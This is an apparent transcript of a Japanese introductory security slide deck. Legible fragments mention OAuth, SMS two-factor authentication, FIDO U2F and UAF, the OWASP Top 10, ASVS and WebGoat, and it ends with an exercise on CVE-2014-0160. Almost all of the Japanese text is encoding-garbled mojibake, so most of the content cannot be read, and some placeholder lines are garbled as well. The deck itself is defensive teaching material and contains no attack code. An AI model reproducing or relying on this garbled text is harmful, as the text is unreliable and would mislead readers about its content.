ύεϫʔυೝূͷ໰୊఺ ʜ๨Ε·ͨ͠ ͍ΖΜͳαʔϏεʹ͍ΖΜͳύεϫʔυΛઃఆ͍ͯͨ͠Β Ϣʔβ͸ύεϫʔυΛ๨ΕΔ ຊ෺ͷ"MJDFͳΒ ύεϫʔυΛ஌͍ͬͯΔഺ ʜ Alice Aliceͷ;ΓΛ͢Δ ѱҙ͋Δୈࡾऀ

ൿີͷ࣭໰ ͜ΕͰ͸ύεϫʔυΛΑΓ؆୯ʹ͍ͯ͠ΔΑ͏ͳ΋ͷͰ͋Δ ޷͖ͳ৯΂෺͸ ͳΜͰ͔͢ Alice Aliceͷ;ΓΛ͢Δ ѱҙ͋Δୈࡾऀ ਖ਼ղ ύεϫʔυΛઃఆ͠௚͍ͯͩ͘͠͞

OAuthೝূ ଟ͘ͷϢʔβ͸ Googleɺfacebook౳ͷ ΞΧ΢ϯτΛ͍࣋ͬͯΔ αʔϏε͸ ࣗ෼͕ͲΜͳ৘ใΛ ඞཁͱ͍ͯ͠Δ͔Λొ࿥͢Δ Ϣʔβ͸ͨ͘͞ΜͷαʔϏεΛར༻͍ͯ͠Δ ͦΕΒʹݸผʹύεϫʔυΛઃఆ͍ͯͨ͠Β ύεϫʔυΛ๨Εͯ͠·͏ͷ͸౰વͰ͋Δ

OAuthೝূ ͋ͷαʔϏε ͋ͷαʔϏεʹ ϩάΠϯ͍ͨ͠ ͋ͷαʔϏεʹ ͜Ε͚ͩͷ৘ใΛ౉͚͢ͲOK? OK ͋ͷαʔϏεʹ ϦΫΤεττʔΫϯ***Λ ౉͍ͯͩ͘͠͞

OAuthೝূ ͋ͷαʔϏε ϦΫΤεττʔΫϯ*** Ͱ͢ ϦΫΤεττʔΫϯ*** ͱ͔͍͏ͷ͕དྷͨΜ͚ͩͲ ͦͷਓ͸͏ͪͷAlice͞ΜͳͷͰ ௨͍ͯ͋͛ͯͩ͘͠͞ Alice͞ΜͷৄࡉΛ஌Γ͍ͨ৔߹͸ ΞΫηετʔΫϯ???Λ࢖͍ͬͯͩ͘͞

͜͜ʹ χίχίಈըͷ ϩάΠϯը໘ΛషΔ Ϣʔβ͸ීஈ࢖͍ͬͯΔSNS౳ʹ ϩάΠϯ͢Ε͹αʔϏεΛར༻Ͱ͖Δ αʔϏεຖʹ ύεϫʔυΛ֮͑Δඞཁ΋ αʔϏεຖʹύεϫʔυΛೖྗ͢Δඞཁ΋ͳ͍ αʔϏεఏڙऀ͸ ۩ମతͳϢʔβೝূΛ
ΑͦͷαʔϏεʹؙ౤͛Ͱ͖Δ ͜͏͍͏ͷ OAuthೝূ OAuthೝূΛ׆༻͍ͯ͠ΔαʔϏεͷྫ χίχίಈը https://account.nicovideo.jp/login

2ཁૉೝূ Ϣʔβ͕ຊ෺Ͱ͋Δ͜ͱΛ֬ೝ͢Δखஈ͸3ͭʹ෼ྨͰ͖Δ 1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔ ύεϫʔυೝূ౳ 2.Ϣʔβ͸ԿͰ͋Δ͔ ࢦ໲ೝূ౳ 3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔ ਎෼ূͷఏࣔ౳ 1Ҏ֎͸ಛผͳ૷ஔΛཁ͢Δҝ ैདྷଟ͘ͷΠϯλʔωοτ্ͷαʔϏε͸1͚ͩΛ࢖͖ͬͯͨ

ϑΟογϯά ຊ෺ͷαʔϏε ِ෺ͷαʔϏε ύεϫʔυ͸ Ͱ͢ ύεϫʔυ͸ Ͱ͢ ύεϫʔυ͸ Ͱ͢ Ϣʔβ͕ԿΛ஌͍ͬͯΔ͔͸
ϑΟογϯάʹର͢Δ଱ੑ͕ͳ͍

2ཁૉೝূ Ϣʔβ͕ຊ෺Ͱ͋Δ͜ͱΛ֬ೝ͢Δखஈ͸3ͭʹ෼ྨͰ͖Δ 1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔ ύεϫʔυೝূ౳ 2.Ϣʔβ͸ԿͰ͋Δ͔ ࢦ໲ೝূ౳ 3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔ ਎෼ূͷఏࣔ౳ 2ͱ3ͷ͍ͣΕ͔Λซ༻ͯ͠ͳΓ͢·͠Λ๷͙ඞཁ͕͋Δ

SMSΛར༻ͨ͠2ཁૉೝূ 3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔ Ϣʔβ͸ొ࿥͞Ε͍ͯΔܞଳి࿩Λ͍࣋ͬͯΔ͔ ύεϫʔυ͸ Ͱ͢ 4.4ʹૹͬͨ൪߸Λ ೖྗ͍ͯͩ͘͠͞ ϩάΠϯ੒ޭ

SMSΛར༻ͨ͠2ཁૉೝূͷ໰୊఺ ύεϫʔυ͸ Ͱ͢ ѱҙ͋Δୈࡾऀ͕SMSΛ೷͖ݟͰ͖ͨΒ ೝূΛಥഁ͞ΕΔ ͦ΋ͦ΋൪߸ೖྗ͢Δͷ ΊΜͲ͍͘͞ ΋ͬͱ҆શ͔ͭखܰʹ 2ཁૉೝূ͢ΔͨΊͷಓ۩͸
࡞Εͳ͍ͩΖ͏͔

FIDO U2F https://www.yubico.com/products/yubikey-hardware/ Ϣʔβ͕͔֬ʹ͜ͷUSBσόΠεΛ͍࣋ͬͯΔࣄΛ ެ։伴҉߸Λ࢖ͬͯূ໌͢Δ૷ஔ ͜͜ʹ ࣮ࡍʹചΒΕ͍ͯΔ'*%06'ͷσόΠεͷը૾ΛషΔ

FIDO U2FͰϢʔβొ࿥ Ϣʔβొ࿥ AppIDΛఴ͑ͯ伴ੜ੒Λཁٻ "QQ*%ʹରԠ͢Δ ൿີ伴ͱެ։伴Λ࡞Δ ެ։伴ͱೝূثূ໌ॻͱ ೝূثূ໌ॻͰ࡞ͬͨॺ໊Λฦ͢ ॺ໊Λ࢖ͬͯ ৴པͰ͖ΔೝূثͰ͋ΔࣄΛ֬ೝ
ެ։伴Λอଘ ొ࿥׬ྃ

FIDO U2FͰϩάΠϯ ύεϫʔυೝূ "QQ*%ʹରԠ͢Δ ൿີ伴ͰDIBMMFOHFΛ҉߸Խ ҉߸Խͨ͠challengeΛฦ͢ อଘͯ͋͠Δެ։伴Ͱ DIBMMFOHFΛ෮߸Ͱ͖ΔࣄΛ֬ೝ ೝূ׬ྃ ύεϫʔυΛ֬ೝ
AppIDͱchallengeΛૹ৴

FIDO UAF ͦ΋ͦ΋ύεϫʔυΛೖྗ͢Δͷ͕ΊΜͲ͍͘͞ 1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔ ύεϫʔυೝূ౳ 2.Ϣʔβ͸ԿͰ͋Δ͔ ࢦ໲ೝূ౳ 3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔ ਎෼ূͷఏࣔ౳ 1Λ࢖Θͣʹ2ͱ3Ͱ2ཁૉೝূ͠Α͏

FIDO UAF ੜମೝূ͕ඞཁʹͳΔͨΊෳࡶͳϋʔυ΢ΣΞ͕ඞཁʹͳΔ͕ Xperia XZ1͕FIDO UAF 1.1ʹ४ڌͨ͠ॳͷσόΠεʹͳͬͨࣄΛใ͡Δهࣄ https://fidoalliance.org/first-fido-uaf-1-1-implementations-ease-deployment- advanced-biometric-authentication-android-devices/ αʔϏε͕FIDO
UAFʹରԠ͢Δ͜ͱͰ ͜͏ͨ͠σόΠεͷϢʔβʹύεϫʔυෆཁͷೝূΛఏڙͰ͖Δ ͜͜ʹ 9QFSJB9;͕'*%06"'ʹ४ڌͨ͜͠ͱΛใ͡ΔهࣄΛషΔ

Webϖʔδʹର͢Δ ߈ܸʹඋ͑Δ

OWASP https://www.owasp.org/ ҆શͳWebΞϓϦέʔγϣϯͷҝͷ৘ใͷڞ༗΍ܒൃΛߦ͏ ΦʔϓϯίϛϡχςΟ ͜͜ʹ 08"41ͷτοϓϖʔδΛషΔ

OWASP Top 10 WebΞϓϦέʔγϣϯ։ൃऀ΁ͷ஫ҙשىΛ໨తͱͯ͠ WebΞϓϦέʔγϣϯͷ୅දతͳ੬ऑੑΛ10छྨબΜͩ΋ͷ https://www.owasp.org/images/2/23/OWASP_Top_10-2017%28ja%29.pdf ࠷৽൛͸OWASP Top 10 2017Ͱ೔ຊޠ༁΋ଘࡏ͢Δ
͜͜ʹ 08"415PQͷදࢴΛషΔ

OWASP Top 10 ΠϯδΣΫγϣϯ ೝূͷෆඋ ػඍͳ৘ใͷ࿐ग़ 9.-֎෦ΤϯςΟςΟࢀর ΞΫηε੍ޚͷෆඋ ෆద੾ͳηΩϡϦςΟઃఆ ΫϩεαΠτεΫϦϓςΟϯά
҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτͷ࢖༻ ෆे෼ͳϩΪϯάͱϞχλϦϯά

͜͜ʹ 08"415PQͷΠϯδΣΫγϣϯͷղઆΛషΔ OWASP Top 10 https://www.owasp.org/images/2/23/ OWASP_Top_10-2017%28ja%29.pdf ੬ऑੑͷछྨຖʹ ͲͷΑ͏ʹൃݟ͢Ε͹ྑ͍͔ ͲͷΑ͏ʹ๷ࢭ͢Ε͹ྑ͍͔
͕వΊΒΕ͍ͯΔ ΠϯδΣΫγϣϯʹର͢Δ๷ࢭํ๏ ΠϯλϓϦλ͔ΒΫΤϦΛ౤͛ͳ͍ ύϥϝʔλԽ͞ΕͨΠϯλʔϑΣʔε ·ͨ͸ORMΛ࢖͏ ಡ΋͏

͜͜ʹ 08"41"474ͷදࢴΛషΔ OWASP Application Security Verification Standard WebΞϓϦέʔγϣϯͷ҆શੑΛݕূ͢ΔͨΊʹ νΣοΫ͢΂͖߲໨Λ·ͱΊͨ΋ͷ ࠷৽൛͸OWASP
ASVS 3.0.1Ͱ೔ຊޠ༁΋ଘࡏ͢Δ IUUQTXXXKQDFSUPSKQTFDVSFDPEJOHNBUFSJBMTPXBTQBTWTIUNM

͜͜ʹ 08"41"474ͷνΣοΫ߲໨ͷҰ෦ΛషΔ OWASP Application Security Verification Standard IUUQTXXXKQDFSUPSKQTFDVSFDPEJOH NBUFSJBMTPXBTQBTWTIUNM ͋ΒΏΔΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ1
ݸਓ৘ใ΍վ͟Μ͞ΕΔͱࠔΔ৘ใΛѻ͏ ΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ2 ো֐ͷൃੜ͕૊৫ͷଘଓ΍ਓ໋ʹؔΘΔ ΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ3 Ϩϕϧ্͕͕Δ΄ͲνΣοΫ߲໨͕૿͑Δ ύεϫʔυมߋػೳʹ ݹ͍ύεϫʔυͷೖྗ ৽͍͠ύεϫʔυͷೖྗ ৽͍͠ύεϫʔυͷ֬ೝ ͷ3ͭΛཁٻ͍ͯ͠Δ͔Ͳ͏͔ΛνΣοΫ WebΞϓϦέʔγϣϯΛ࡞ͬͨΒ νΣοΫ͠Α͏

͜͜ʹ 08"418FC(PBUͷը૾ΛషΔ OWASP WebGoat https://github.com/WebGoat/WebGoat JavaͰॻ͔ΕͨWebΞϓϦέʔγϣϯ ҙਤతʹ༷ʑͳ੬ऑੑ͕࢓ࠐ·Ε͍ͯΔ ੬ऑੑΛ࣮ફతʹֶͼ͍ͨ ࣗ෼ͷߦͳ͍ͬͯΔ੬ऑੑͷνΣοΫ͕ ਖ਼͍͔͔֬͠Ί͍ͨ
ͦ͏͍͏࣌ʹ࢖͑Δ

࠷ޙʹ

͋ΒΏΔιϑτ΢ΣΞηΩϡϦςΟ͸ ෺ཧతͳηΩϡϦςΟΛલఏͱ͍ͯ͠Δ ѱҙ͋Δୈࡾऀ͕αʔόϧʔϜʹ৵ೖͯ͠ిݯέʔϒϧΛൈ͘͜ͱͰ αʔϏεΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ੬ऑੑ ·ͣށకΓ ιϑτ΢ΣΞηΩϡϦςΟ͸ͦΕ͔Βͩ ͜ͷΑ͏ͳ߈ܸʹରͯ͠ιϑτ΢ΣΞ͸جຊతʹଧͭख͕ͳ͍

՝୊ CVE-2014-0160 ͜ͷ੬ऑੑ͕Ͳ͏͍͏࣌ʹԿ͕ى͜Δ΋ͷͰ ͦͷ݁ՌͲͷΑ͏ͳѱӨڹ͕༧૝͞ΕΔ͔Λઆ໌͍ͯͩ͘͠͞ ͜ͷ੬ऑੑΛճආ͢ΔͨΊʹͱΓ͏ΔରԠΛ1ͭҎ্ड़΂͍ͯͩ͘͞

セキュリティ入門

セキュリティ入門

More Decks by Fadis

Other Decks in Programming

Featured

Transcript